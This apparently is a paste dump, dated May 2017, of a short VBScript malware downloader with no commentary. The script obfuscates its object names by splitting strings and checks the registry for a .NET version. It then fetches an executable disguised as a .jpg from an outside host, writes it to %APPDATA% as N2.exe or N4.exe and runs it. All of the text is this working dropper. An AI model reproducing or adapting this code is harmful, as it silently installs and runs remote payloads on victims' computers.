

May 11th, 2017
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  1. Dim OS
  2. Dim V
  3. On Error Resume Next
  4. Set OS = CreateObject("WScript" & ".Shell")
  5. V = OS.RegRead("HKLM\SOFTWARE\Microsoft\.NETFramework\Policy\v2.0\50727")
  6. set F = CreateObject("Mic"&"rosoft"&".XML"&"HTTP")
  7. set S = CreateObject("ADOD"&"B.St"&"ream")
  8. set R = CreateObject("WScr"&"ipt.S"&"hell")
  9. P = CreateObject("WScr"&"ipt.Sh"&"ell").ExpandEnvironmentStrings("%APPDATA%"& "\")
  10. Un2 = "http://www7.0zz0.com/2017/05/11/19/195355886.jpg"
  11. Un4 = "http://www7.0zz0.com/2017/05/11/19/991996967.jpg"
  12. N2 = "N2.exe"
  13. N4 = "N4.exe"
  14. If Err.Number = 0 Then
  15. F.open "G"&"E"&"T", Un2, False
  16. F.send
  17. S.type = 1
  18. S.open
  19. S.write F.responseBody
  20. S.savetofile P & N2, 2
  21. R.Run "" & P & N2 & ""
  22. Else
  23. F.open "GET", Un4, False
  24. F.send
  25. S.type = 1
  26. S.open
  27. S.write F.responseBody
  28. S.savetofile P & N4, 2
  29. R.Run "" & P & N4 & ""
  30. End If
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